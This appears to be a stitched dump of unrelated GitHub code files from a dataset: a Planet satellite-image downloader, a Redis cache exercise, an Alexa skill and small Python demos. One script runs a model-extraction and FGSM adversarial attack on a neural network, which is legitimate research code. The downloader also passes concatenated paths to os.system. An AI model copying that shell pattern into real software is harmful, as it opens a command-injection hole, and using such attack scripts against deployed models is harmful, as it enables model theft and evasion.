activate_a_asset_on_server(asset)\n if out is False:\n return False\n\n # wait until the asset has been activated\n asset_activated = False\n while asset_activated == False:\n # Get asset and its activation status\n assets = get_assets_from_server(item) # need to get the status from the server\n asset = assets.get(asset_key)\n asset_status = asset[\"status\"]\n\n # If asset is already active, we are done\n if asset_status == 'active':\n asset_activated = True\n print(\"Process: %d, Asset is active and ready to download\"%proc_id)\n\n # Still activating. Wait and check again.\n else:\n print(\"Process: %d, ...Still waiting for asset activation...\"%proc_id)\n # time.sleep(3)\n waitime = random.randint(process_num, process_num + 30)\n time.sleep(waitime)\n\n return download_a_asset_from_server(item,assets,asset_key,save_dir)\n\n\ndef read_down_load_geometry(folder):\n '''\n read geojson files in a folder. geojson file stores the geometry of a file, and save to global varialbes\n :param folder: the save folder\n :return:\n '''\n global downloaded_scene_geometry\n json_list = io_function.get_file_list_by_ext('.geojson',folder, bsub_folder=False)\n for json_file in json_list:\n\n # ignore the scenes in the excluded list\n item_id = os.path.splitext(os.path.basename(json_file))[0]\n if item_id in manually_excluded_scenes:\n continue\n\n scene_folder = os.path.splitext(json_file)[0]\n asset_files = io_function.get_file_list_by_pattern(scene_folder,'*')\n if len(asset_files) < 3:\n basic.outputlogMessage('downloading of scene %s is not compelte, ignore it'%item_id)\n continue\n\n with open(json_file) as json_file:\n data = json.load(json_file)\n # p(data) # test\n downloaded_scene_geometry.append(data)\n\ndef read_excluded_scenes(folder):\n '''\n manually excluded some scenes with small portion of cloud cover,\n because some of the scenes have cloud cover, but not shown in the metedata\n :param folder:\n :return:\n '''\n txt_path = os.path.join(folder,'manually_excluded_scenes.txt')\n global manually_excluded_scenes\n if os.path.isfile(txt_path):\n with open(txt_path,'r') as f_obj:\n lines = f_obj.readlines()\n for line in lines:\n if '#' in line or len(line) < 6:\n continue\n manually_excluded_scenes.append(line.strip())\n else:\n basic.outputlogMessage('Warning, %s file does not exist'%txt_path)\n\n\ndef check_geom_polygon_overlap(boundary_list, polygon):\n '''\n check if a polygon is covered by any polygons in a geom_list\n :param boundary_list: a list containing polygon\n :param polygon: a polygon\n :return: True if the polygon was cover a polyon by other, False otherwise\n '''\n\n # convert from json format to shapely\n polygon_shapely = shape(polygon)\n\n # using shapely to check the overlay\n for geom in boundary_list:\n geom_shapely = shape(geom)\n if geom_shapely.contains(polygon_shapely):\n return True\n\n return False\n\ndef get_downloadable_assets(scene_item):\n permissions = scene_item['_permissions']\n # e.g., assets.analytic:download remove: assets and download\n valid_assets = [ item.split(':')[0].split('.')[1] for item in permissions]\n return valid_assets\n\ndef select_items_to_download(idx, cloud_cover_thr, polygon, all_items):\n \"\"\"\n choose which item to download\n :param idx: the polygon\n :param cloud_cover_thr, cloud cover threshold\n :param polygon: the polygon\n :param all_items: item list\n :return: item list if find items to download, false otherwise\n \"\"\"\n if len(all_items) < 1:\n basic.outputlogMessage('No inquiry results for %dth polygon' % idx)\n return 
False\n\n # Update on 5 November 2020\n # for some of the scenes, cloud cover is not the real cloud cover,\n # maybe due to Usable Data Masks https://developers.planet.com/docs/data/udm-2/\n # in this case, we should use 'cloud_percent' (int 0-100), otherwise, use 'cloud_cover' (double, 0-1)\n\n cloud_key = 'cloud_cover' # double 0-1\n cloud_percent_count = 0\n cloud_cover_count = 0\n all_count = len(all_items)\n for item in all_items:\n if 'cloud_percent' in item['properties']:\n cloud_percent_count += 1\n if 'cloud_cover' in item['properties']:\n cloud_cover_count += 1\n\n if cloud_percent_count == all_count:\n cloud_key = 'cloud_percent' # int 0-100\n basic.outputlogMessage('Warning, cloud_percent exists and would be used (cloud_cover will be ignored), maybe these images are acquired after August 2018')\n elif cloud_percent_count > all_count/2:\n cloud_key = 'cloud_percent' # int 0-100\n basic.outputlogMessage('Warning, more than half scenes have cloud_percent (only %d out of %d), %d ones have cloud_cover, cloud_percent will be used'\n %(cloud_percent_count,all_count,cloud_cover_count))\n\n # remove items without cloud_percent\n all_items = [ item for item in all_items if 'cloud_percent' in item['properties']]\n basic.outputlogMessage('Warning, removed %d scenes without cloud_percent, remain %d ones'%(all_count-len(all_items), len(all_items)))\n all_count = len(all_items)\n\n else:\n basic.outputlogMessage('Warning, cloud_percent exists, but only %d out of %d (less than half), %d ones have cloud_cover, cloud_cover will be used'\n % (cloud_percent_count, len(all_items), cloud_cover_count))\n\n\n # sort the item based on cloud cover\n all_items.sort(key=lambda x: float(x['properties'][cloud_key]))\n # [print(item['id'],item['properties'][cloud_key]) for item in all_items]\n\n # for item in all_items:\n # print(item)\n pre_sel_cloud_list = [str(item['properties'][cloud_key]) for item in all_items]\n basic.outputlogMessage('Before selection, could covers after sort: %s'%'_'.join(pre_sel_cloud_list))\n\n # items with surface\n all_items_sr = []\n all_items_NOsr = []\n items_other = []\n for item in all_items:\n valid_assets = get_downloadable_assets(item)\n if 'analytic_sr' in valid_assets:\n all_items_sr.append(item)\n continue\n if 'analytic' in valid_assets:\n all_items_NOsr.append(item)\n else:\n items_other.append(item)\n\n # put the one with 'analytic_sr' before others\n all_items = []\n all_items.extend(all_items_sr)\n all_items.extend(all_items_NOsr)\n all_items.extend(items_other)\n basic.outputlogMessage('Among the scenes, %d, %d, and %d of them have analytic_sr, only have analytic, '\n 'and do not have analytic or analytic_sr asset'%(len(all_items_sr), len(all_items_NOsr),len(items_other)))\n\n # convert from json format to shapely\n polygon_shapely = shape(polygon)\n\n # consider the coverage\n total_intersect_area = 0\n merged_item_extent = None\n selected_items = []\n for item in all_items:\n # print(item['id'])\n if item['id'] in manually_excluded_scenes:\n continue\n\n geom = item['geometry']\n geom_shapely = shape(geom)\n\n # extent the coverage\n if merged_item_extent is None:\n merged_item_extent = geom_shapely\n else:\n # merged_item_extent.union(geom_shapely)\n merged_item_extent = merged_item_extent.union(geom_shapely)\n # merged_item_extent = merged_item_extent.cascaded_union(geom_shapely)\n\n # calculate the intersection\n intersect = polygon_shapely.intersection(merged_item_extent)\n # print('intersect.area',intersect.area, 'total_intersect_area', 
total_intersect_area, 'polygon_shapely.area',polygon_shapely.area)\n if intersect.area > total_intersect_area:\n total_intersect_area = intersect.area\n selected_items.append(item)\n\n if total_intersect_area >= polygon_shapely.area:\n break\n\n # remove some scenes with cloud cover greater than cloud_cover_thr.\n # We also used cloud_cover_thr (0-1) when inquiring images, this may apply to 'cloud_cover' key (double 0-1), but this 'cloud_cover' may wrong\n # we sort the images based on cloud cover, but still may have some scenes has large cloud cover based on 'cloud_percent'(int 0-100)\n # here, we remove scenes 'cloud_percent' > cloud_cover_thr*100\n if cloud_key == 'cloud_percent':\n cloud_cover_thr_int = int(cloud_cover_thr * 100)\n count_before = len(selected_items)\n selected_items = [item for item in selected_items if item['properties'][cloud_key] < cloud_cover_thr_int ]\n count_after = len(selected_items)\n basic.outputlogMessage('After sorting (cloud), selecting based on geometry, '\n 'still remove %d scenes based on cloud_percent smaller than %d'%((count_before-count_after),cloud_cover_thr_int))\n\n if len(selected_items) < 1:\n basic.outputlogMessage('No inquiry results for %dth polygon after selecting results' % idx)\n return False\n\n sel_cloud_list = [str(item['properties'][cloud_key]) for item in selected_items]\n basic.outputlogMessage('After selection, could covers of images are: %s'%'_'.join(sel_cloud_list))\n\n return selected_items\n\n\ndef check_asset_exist(download_item, asset, save_dir):\n '''\n check weather a asset already exist\n :param download_item:\n :param asset:\n :param save_dir:\n :return:\n '''\n\n # asset_types = ['analytic_sr', 'analytic_xml', 'udm']\n id = download_item['id']\n if asset=='analytic_sr':\n output_name = id + '_3B_AnalyticMS_SR.tif'\n elif asset=='analytic':\n output_name = id + '_3B_AnalyticMS.tif'\n elif asset=='analytic_xml':\n output_name = id + '_3B_AnalyticMS_metadata.xml'\n elif asset=='udm':\n output_name = id + '_3B_AnalyticMS_DN_udm.tif'\n else:\n raise ValueError('unsupported asset type')\n # basic.outputlogMessage('unsupported asset type')\n # return False\n\n if os.path.isfile(os.path.join(save_dir, output_name)):\n basic.outputlogMessage('file %s exist (item id: %s), skip downloading'%(output_name,id))\n return True\n else:\n return False\n\n\n\ndef download_planet_images(polygons_json, start_date, end_date, cloud_cover_thr, item_types, save_folder,process_num):\n '''\n download images from for all polygons, to save quota, each polygon only downlaod one image\n :param polygons_json: a list of polygons in json format\n :param start_date:\n :param end_date:\n :param cloud_cover_thr:\n :param save_folder:\n :return: True if successful, false otherwise\n '''\n\n for idx, geom in enumerate(polygons_json):\n\n # for test\n # if idx > 20: break\n # if idx != 1: continue\n # if idx != 344: continue\n\n ####################################\n #check if any image already cover this polygon, if yes, skip downloading\n if check_geom_polygon_overlap(downloaded_scene_geometry, geom) is True:\n basic.outputlogMessage('%dth polygon already in the extent of downloaded images, skip it'%idx)\n continue\n\n res, item_count = search_scenes_on_server(idx, geom, start_date, end_date, cloud_cover_thr,item_types)\n if res is False:\n continue\n if res.response.status_code == 200:\n all_items = []\n for item in res.items_iter(item_count):\n # print(item['id'], item['properties']['item_type'])\n all_items.append(item)\n\n\n # I want to download SR, level 
3B, product\n select_items = select_items_to_download(idx,cloud_cover_thr, geom, all_items)\n if select_items is False:\n continue\n basic.outputlogMessage('After selection, the number of images need to download is %d' % len(select_items))\n if select_items is False:\n continue\n\n sub_tasks = []\n for download_item in select_items:\n download_item_id = download_item['id']\n # p(item['geometry'])\n save_dir = os.path.join(save_folder, download_item_id)\n save_geojson_path = os.path.join(save_folder, download_item_id + '.geojson')\n if os.path.isfile(save_geojson_path) and os.path.isdir(save_dir):\n basic.outputlogMessage('scene %s has been downloaded: %s'%(download_item_id,save_dir))\n continue\n\n os.system('mkdir -p ' + save_dir)\n assets = get_assets_from_server(download_item)\n basic.outputlogMessage('download a scene (id: %s) that cover the %dth polygon' % (download_item_id, idx))\n\n # check 'analytic_sr' is available, if not, d\n valid_assets = get_downloadable_assets(download_item)\n # print(valid_assets)\n download_asset_types = asset_types.copy()\n if 'analytic_sr' not in valid_assets:\n basic.outputlogMessage('warning, analytic_sr is not available in the scene (id: %s), download analytic instead'%download_item_id)\n download_asset_types.remove('analytic_sr')\n download_asset_types.extend(supp_asset_types) # 'analytic'\n\n #####################################\n for asset in sorted(assets.keys()):\n if asset not in download_asset_types:\n continue\n if check_asset_exist(download_item, asset, save_dir):\n continue\n\n #\n # if activate_and_download_asset(download_item, assets, asset, save_dir,process_num):\n # basic.outputlogMessage('downloaded asset type: %s of scene (%s)' % (asset, download_item_id))\n ############################################################\n ## parallel activate and download sub_tasks\n while True:\n if basic.alive_process_count(sub_tasks) < process_num:\n sub_process = Process(target=activate_and_download_asset,args=(download_item, assets, asset, save_dir,process_num))\n sub_process.start()\n sub_tasks.append(sub_process)\n # time.sleep(200)\n # print('sleep 200')\n break\n else:\n time.sleep(5) # wait, then try again.\n\n\n # save the geometry of this item to disk\n with open(save_geojson_path, 'w') as outfile:\n json.dump(download_item['geometry'], outfile,indent=2)\n # update the geometry of already downloaded geometry\n downloaded_scene_geometry.append(download_item['geometry'])\n\n # wait until all task finished\n while basic.b_all_process_finish(sub_tasks) is False:\n print(datetime.now(),': wait all submitted tasks to finish ')\n time.sleep(10)\n\n else:\n print('code {}, text, {}'.format(res.response.status_code, res.response.text))\n\n return True\n\ndef main(options, args):\n\n polygons_shp = args[0]\n save_folder = args[1] # folder for saving downloaded images\n\n # check training polygons\n assert io_function.is_file_exist(polygons_shp)\n os.system('mkdir -p ' + save_folder)\n\n item_types = options.item_types.split(',') # [\"PSScene4Band\"] # , # PSScene4Band , PSOrthoTile\n\n start_date = datetime.strptime(options.start_date, '%Y-%m-%d') #datetime(year=2018, month=5, day=20)\n end_date = datetime.strptime(options.end_date, '%Y-%m-%d') #end_date\n cloud_cover_thr = options.cloud_cover # 0.01\n\n planet_account = options.planet_account\n process_num = options.process_num\n\n # set Planet API key\n get_and_set_Planet_key(planet_account)\n\n shp_prj = map_projection.get_raster_or_vector_srs_info_proj4(polygons_shp).strip()\n if shp_prj != 
'+proj=longlat +datum=WGS84 +no_defs':\n # reproject to 4326 projection\n basic.outputlogMessage('reproject %s to latlon'%polygons_shp)\n latlon_shp = io_function.get_name_by_adding_tail(polygons_shp,'latlon')\n if os.path.isfile(latlon_shp) is False:\n vector_gpd.reproject_shapefile(polygons_shp,'EPSG:4326',latlon_shp)\n polygons_shp = latlon_shp\n basic.outputlogMessage('save new shapefile to %s for downloading images' % polygons_shp)\n\n # read polygons\n polygons_json = read_polygons_json(polygons_shp)\n\n read_excluded_scenes(save_folder) # read the excluded_scenes before read download images\n\n #read geometry of images already in \"save_folder\"\n read_down_load_geometry(save_folder)\n\n\n # download images\n download_planet_images(polygons_json, start_date, end_date, cloud_cover_thr, item_types, save_folder,process_num)\n\n #check each downloaded ones are completed, otherwise, remove the incompleted ones\n geojson_list = io_function.get_file_list_by_ext('.geojson',save_folder,bsub_folder=False)\n # print(geojson_list)\n incom_dir = os.path.join(save_folder, 'incomplete_scenes')\n\n for geojson_file in geojson_list:\n scene_id = os.path.splitext(os.path.basename(geojson_file))[0]\n scene_dir = os.path.join(save_folder,scene_id)\n files = io_function.get_file_list_by_pattern(scene_dir,scene_id+'*')\n # print(files)\n if len(files) != len(asset_types):\n if os.path.isdir(incom_dir):\n io_function.mkdir(incom_dir)\n\n basic.outputlogMessage('warning, downloading of %s is not completed, move to incomplete_scenes '%scene_id)\n io_function.movefiletodir(scene_dir,incom_dir,overwrite=True)\n io_function.movefiletodir(geojson_file,incom_dir,overwrite=True)\n\n\n test = 1\n\n\n\n pass\n\nif __name__ == \"__main__\":\n\n usage = \"usage: %prog [options] polygon_shp save_dir\"\n parser = OptionParser(usage=usage, version=\"1.0 2019-10-01\")\n parser.description = 'Introduction: search and download Planet images '\n parser.add_option(\"-s\", \"--start_date\",default='2018-04-30',\n action=\"store\", dest=\"start_date\",\n help=\"start date for inquiry, with format year-month-day, e.g., 2018-05-23\")\n parser.add_option(\"-e\", \"--end_date\",default='2018-06-30',\n action=\"store\", dest=\"end_date\",\n help=\"the end date for inquiry, with format year-month-day, e.g., 2018-05-23\")\n parser.add_option(\"-c\", \"--cloud_cover\",\n action=\"store\", dest=\"cloud_cover\", type=float,\n help=\"the could cover threshold, only accept images with cloud cover less than the threshold\")\n parser.add_option(\"-i\", \"--item_types\",\n action=\"store\", dest=\"item_types\",default='PSScene4Band',\n help=\"the item types, e.g., PSScene4Band,PSOrthoTile\")\n parser.add_option(\"-a\", \"--planet_account\",\n action=\"store\", dest=\"planet_account\",default='huanglingcao@link.cuhk.edu.hk',\n help=\"planet email account, e.g., huanglingcao@link.cuhk.edu.hk\")\n parser.add_option(\"-p\", \"--process_num\",\n action=\"store\", dest=\"process_num\",type=int,default=10,\n help=\"number of processes to download images\")\n\n\n\n (options, args) = parser.parse_args()\n if len(sys.argv) < 2 or len(args) < 1:\n parser.print_help()\n sys.exit(2)\n\n basic.setlogfile('download_planet_images_%s.log'%str(datetime.date(datetime.now())))\n\n main(options, args)\n","repo_name":"yghlc/rs_data_proc","sub_path":"planetScripts/download_planet_img.py","file_name":"download_planet_img.py","file_ext":"py","file_size_in_byte":28721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} 
+{"seq_id":"31388315385","text":"#!/usr/bin/env python3\n\"\"\"Cache class module\"\"\"\nfrom typing import Callable, Optional, Union\nfrom uuid import uuid4\nfrom functools import wraps\nimport redis\n\n\ndef count_calls(method: Callable) -> Callable:\n \"\"\"decorator func that returns a Callable\"\"\"\n key = method.__qualname__ # sets the function's name as redis key\n\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n \"\"\"wrapper for decorated function\"\"\"\n # increases the value each time the func is called\n self._redis.incr(key)\n return method(self, *args, **kwargs)\n\n return wrapper\n\n\ndef call_history(method: Callable) -> Callable:\n \"\"\"store the history of inputs and outputs\"\"\"\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n \"\"\"wrapper for the decorated function\"\"\"\n inputs = str(args) # stringify passed in arguments\n # stringify return value\n outputs = str(method(self, *args, **kwargs))\n\n # create a key with list as values using rpush\n # method.__qualname__ returns the name of the called func / method\n # and appends :inputs to it e.g `Cache.store:inputs`\n\n # append functions return to redis list `Cache.store:inputs`\n self._redis.rpush(method.__qualname__ + \":inputs\", inputs)\n # append functions return to redis list `Cache.store:outputs`\n self._redis.rpush(method.__qualname__ + \":outputs\", outputs)\n return outputs\n\n return wrapper\n\n\ndef replay(fn: Callable):\n \"\"\"display the history of calls of a particular function\"\"\"\n r = redis.Redis()\n function_name = fn.__qualname__\n # print(function_name)\n value = r.get(function_name) # get the number of times twas called\n # print(value)\n try:\n value = int(value.decode(\"utf-8\"))\n except UnicodeDecodeError:\n value = 0\n except ValueError:\n value = 0\n print(\"{} was called {} times:\".format(function_name, value))\n\n inputs = r.lrange(\"{}:inputs\".format(function_name), 0, -1)\n\n outputs = r.lrange(\"{}:outputs\".format(function_name), 0, -1)\n # abc = zip(inputs, outputs)\n # for a, b in abc:\n # print(a, b)\n\n # since all values are byte-encoded, we av to decode to utf-8\n for input, output in zip(inputs, outputs):\n try:\n input = input.decode(\"utf-8\")\n except UnicodeDecodeError:\n input = \"\"\n\n try:\n output = output.decode(\"utf-8\")\n except UnicodeDecodeError:\n output = \"\"\n\n # print(f\"{function_name}(*{input}) -> {output}\")\n print(\"{}(*{}) -> {}\".format(function_name, input, output))\n\n\nclass Cache:\n \"\"\"Cache class\"\"\"\n\n def __init__(self):\n self._redis = redis.Redis()\n self._redis.flushdb()\n\n @count_calls\n @call_history\n def store(self, data: Union[str, bytes, int, float]) -> str:\n \"\"\"\n The store function takes in a string, bytes, int or float and stores it\n in redis.\n\n data: variable data to be stored\n return: It returns the key that was used to store the data.\n \"\"\"\n uuid_key = str(uuid4()) # generate a random key\n self._redis.set(uuid_key, data) # store data in redis using uuid-key\n return uuid_key\n\n def get(self, key: str,\n fn: Optional[callable] = None) -> Union[str, bytes, int, float]:\n \"\"\"\n take a `key` string argument and an optional `Callable` argument named\n `fn` that will be used to convert the data back to the desired format\n \"\"\"\n value = self._redis.get(key)\n if fn:\n value = fn(value)\n return value\n\n def get_str(self, key: str) -> str:\n \"\"\"automatically parametrize Cache.get with the correct\n conversion function\"\"\"\n value = self._redis.get(key)\n return 
value.decode(\"utf-8\")\n\n def get_int(self, key: str) -> int:\n \"\"\"automatically parametrize Cache.get with the correct\n conversion function\"\"\"\n value = self._redis.get(key)\n try:\n value = int(value.decode(\"utf-8\"))\n except ValueError:\n value = 0\n return value\n","repo_name":"fashemma007/alx-backend-storage","sub_path":"0x02-redis_basic/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1994722970","text":"import csv\nfrom flask import Flask\nfrom flask_ask import Ask, statement, question, request\n\nfrom filter.filter import Filter\nfrom preprocessor.preprocessor import PreProcessor\nfrom recommender.recommender import Recommender\n\napp = Flask(__name__)\nask = Ask(app, '/')\n\n\n@ask.launch\ndef start_skill():\n startup_message = \"Hi and welcome to 'Secret Santa'. I can help you find a birthday or christmas present \\\n for a family member. Just say 'Alexa, help me find a present!'.\"\n return question(startup_message)\n\n\n@ask.intent('GiftRecommendationIntent')\ndef handle_slot_values():\n recommended_products = get_present_recommendations(request)\n speech_output = Filter.create_speech(recommended_products)\n return statement(speech_output)\n\n\ndef get_present_recommendations(skill_request):\n # Get Slot Values from Alexa Request\n [fav_categories, max_price] = PreProcessor.build_user_vector(skill_request.intent.slots)\n\n # Get Recommendations\n recommended_category = Recommender.get_recommendations(fav_categories)\n\n # Load Data from CSV\n csv_data = csv.DictReader(open('data/final_dataset_metadata_sentiment.csv'))\n\n # Filter Products\n products = Filter.extract_products(csv_data, recommended_category)\n products = Filter.filter_by_pricing(products, max_price)\n products = Filter.sort_by_sentiment(products)\n return products\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ChriAZi/ws2020-iui","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11507090207","text":"\"\"\"\n编写完毕的代码,在没有运行的时候,称之为程序\n\n正在运行着的代码,就成为进程\n\n进程,除了包含代码以外,还有需要运行的环境等,所以和程序是有区别的\n\"\"\"\n\n#windows 不支持fork,需要在linux环境执行\nimport os\nimport time\n\n#程序执行到os.fork()时,操作系统会创建一个新的进程(子进程),然后复制父进程的所有信息到子进程中\n#然后父进程和子进程都会从fork()函数中得到一个返回值,在子进程中这个值一定是0,而父进程中是子进程的 id号\nret = os.fork()\nif ret==0:\n while True:\n print(\"===子进程===\")\n time.sleep(1)\nelse:\n while True:\n print(\"===父进程===\")\n time.sleep(1)","repo_name":"chenmingrang/python_study","sub_path":"study_further/system_programming_process/fork_demo.py","file_name":"fork_demo.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2351110387","text":"import sys\nimport argparse\n\nfrom common import Logger\nfrom attack import MSAttack\nfrom defense import MSDefense\nimport common as comm\n\n\ndef run_attack(args):\n msd = MSDefense(args)\n msd.load(netv_path='saved_model/pretrained_net/net3conv_mnist.pth')\n\n msa = MSAttack(args, defense_obj=msd)\n msa.load()\n\n comm.accuracy(msa.netS, 'netS', test_loader=msa.test_loader)\n comm.accuracy(msd.netV, 'netV', test_loader=msd.test_loader)\n\n msa.train_netS('saved_model/netS_mnist_temp.pth', data_type=\"REAL\", label_only=False)\n\n comm.accuracy(msa.netS, 'netS', test_loader=msa.test_loader)\n 
comm.accuracy(msd.netV, 'netV', test_loader=msd.test_loader)\n\n msa.attack(\"FGSM\")\n # msa.attack(\"BIM\")\n # msa.attack(\"CW\")\n # msa.attack(\"PGD\")\n\n\nif __name__ == '__main__':\n sys.stdout = Logger('ms_attack.log', sys.stdout)\n\n args = argparse.ArgumentParser()\n args.add_argument('--cuda', default=False, action='store_true', help='using cuda')\n args.add_argument('--dataset', type=str, default='MNIST')\n args.add_argument('--num_class', type=int, default=10)\n\n args.add_argument('--epoch_b', type=int, default=20, help='for training net V')\n args.add_argument('--epoch_g', type=int, default=5, help='for training net S')\n\n args.add_argument('--lr', type=float, default=0.0001)\n args = args.parse_args()\n\n run_attack(args)\n\n\n","repo_name":"ChiHong-Xtautau/BRP-AdversarialAttacks","sub_path":"run_exp.py","file_name":"run_exp.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26104364446","text":"from datetime import datetime\nimport gc\nimport glob\nimport pandas as pd\nimport os\nimport logging\nimport warnings\n\n# For some reason there are non-unique indexes because multiple data values at the same timestamp exist\n# No clue why but this is probably intended\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# Flag for testing reasons\nisLinux = True\nOUTPUT_DIR = os.path.join(\".\", \"output\") if not isLinux else \"./output\"\nLOG_DIR = os.path.join(\".\", \"logs\") if not isLinux else \"./logs\"\n\n# Ensuring the directories exist, creating them if they don't\nif not os.path.exists(LOG_DIR):\n print(f\"Log directory not found, creating {LOG_DIR}...\")\n os.makedirs(LOG_DIR)\nif not os.path.exists(OUTPUT_DIR):\n print(f\"Output directory not found, creating {OUTPUT_DIR}...\")\n os.makedirs(OUTPUT_DIR)\n\n# Logging Configuration\ncurrent_time_str = datetime.now().strftime(\"%Y%m%dT%H%M%S\")\nlog_filename = os.path.join(LOG_DIR, f\"{current_time_str}.log\")\nlogging.basicConfig(filename=log_filename, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\n# Function to post-process each file and fill any missing spaces\ndef post_process_file(filepath):\n start_time = datetime.now() # Start the timer for this file\n\n try:\n df = pd.read_csv(filepath) # Read the file into a DataFrame\n df['timestamp'] = pd.to_datetime(\n df['timestamp'], format='%m/%d/%Y %H:%M') # Convert to DatetimeIndex\n df.set_index('timestamp', inplace=True) # Set the timestamp as the index for the DataFrame\n\n # Aggregating duplicate indexes by taking the mean of the values\n df = df.groupby(level=0).mean()\n\n df = df.resample('H').asfreq() # Resample to hourly intervals and insert missing rows\n df.fillna(\"NaN\", inplace=True) # Fill all missing values with \"NaN\"\n df.to_csv(filepath) # Write the processed DataFrame back to the CSV file\n\n elapsed_time = datetime.now() - start_time # Calculate elapsed time\n logging.info(f\"Processed file {filepath} in {elapsed_time}\")\n\n # Log all errors\n except Exception as e:\n logging.error(f\"Error processing file {filepath}: {e}\")\n\n\n# Post-process all the files in the old directory\noutput_files = glob.iglob(os.path.join(OUTPUT_DIR, \"*.csv\"))\nfor i, outfile in enumerate(output_files, 1):\n post_process_file(outfile) # Process\n gc.collect() # Collect 
garbage\n","repo_name":"marcellonovak/eager-tests","sub_path":"postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42173162841","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\n#leer y redimensionar\r\nmet_original = cv.imread(\"Imagenes_para_prueba\\met_hierro_nod.jpg\")\r\nmet_rs = cv.resize(met_original, [int(met_original.shape[1]//3), int(met_original.shape[0]//3)])\r\ncv.imshow(\"METALOGRAFIA_ORIGIANL\", met_rs)\r\n\r\nblank = np.zeros(met_rs.shape, dtype='uint8')\r\ncv.imshow('Blank', blank)\r\n\r\n\r\n#convertir a escala de grises\r\nmet_rs_gray = cv.cvtColor(met_rs, cv.COLOR_BGR2GRAY) \r\n# cv.imshow(\"METALOGRAFIA_REDIMESIONADA_GRIS\", met_rs_gray)\r\n\r\n#FILTRO GAUSSIANO\r\n\r\nmet_rs_gray_gauss = cv.GaussianBlur(met_rs_gray, (5,5), cv.BORDER_DEFAULT)\r\n# cv.imshow(\"METALOGRAFIA_RS_G_GS\", met_rs_gray_gauss)\r\n\r\n#THRESHOLD\r\n\r\nret, thresh = cv.threshold(met_rs_gray, 125, 255, cv.THRESH_BINARY)\r\ncv.imshow(\"METALOGRAFIA_RS_GRAY_THRESH\", thresh)\r\n\r\ncontours, hierarchies = cv.findContours(thresh, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\nprint(f'{len(contours)} contour(s) found!')\r\n\r\n#CONTOUR DETECTION (CANNY)\r\n\r\n# met_r_g_cy_gs = cv.Canny(met_rs_gray_gauss, 125, 175)\r\n# cv.imshow(\"METALOGRAFIA_RS_GRAY_GAUSS_CANNY\", met_r_g_cy_gs)\r\n\r\n# met_rs_gray_gauss_3sh = cv.Canny(thresh, 125 , 175)\r\n# cv.imshow(\"METALOGRAFIA_RS_GRAY_GAUSS_3SH_CANNY\", met_rs_gray_gauss_3sh)\r\n\r\n# contours, hierarchies = cv.findContours(met_r_g_cy_gs, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\n# print(f'{len(contours)} contour(s) found!')\r\n\r\n# contours, hierarchies = cv.findContours(met_r_g_cy_gs, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\n# print(f'{len(contours)} contour(s) found!')\r\n\r\n#DIBUJAR CONTORNOS\r\n\r\ncv.drawContours(blank, contours, -1, (0, 0, 255), 1)\r\ncv.imshow('CONTORNOS DIBUJADOS', blank)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncv.waitKey(0)\r\n","repo_name":"Javier0CG/Proyect","sub_path":"7_contour_detection.py","file_name":"7_contour_detection.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72528621046","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data.dataset import Subset\nimport torchvision\nfrom torchvision import transforms\nimport asdl\n\n\nclass Net(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 4, 5, bias=False)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(4, 6, 5)\n self.fc1 = nn.Linear(6 * 5 * 5, 6, bias=False)\n self.fc2 = nn.Linear(6, 8)\n self.fc3 = nn.Linear(8, 10)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = torch.flatten(x, 1)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n\ndef main():\n top_k = 10\n for fisher_type in [asdl.FISHER_EMP, asdl.FISHER_MC, asdl.FISHER_EXACT]:\n for fisher_shape in [asdl.SHAPE_FULL, asdl.SHAPE_LAYER_WISE]:\n print('=============================')\n print(f'fisher_type: {fisher_type}, fisher_shape: {fisher_shape}')\n eigvals1, _ = asdl.fisher_eig_for_cross_entropy(model, fisher_type, fisher_shape,\n data_loader=trainloader, top_n=top_k, seed=1)\n print(f'Top-{top_k} eigenvalues by power method:')\n print(eigvals1)\n f = 
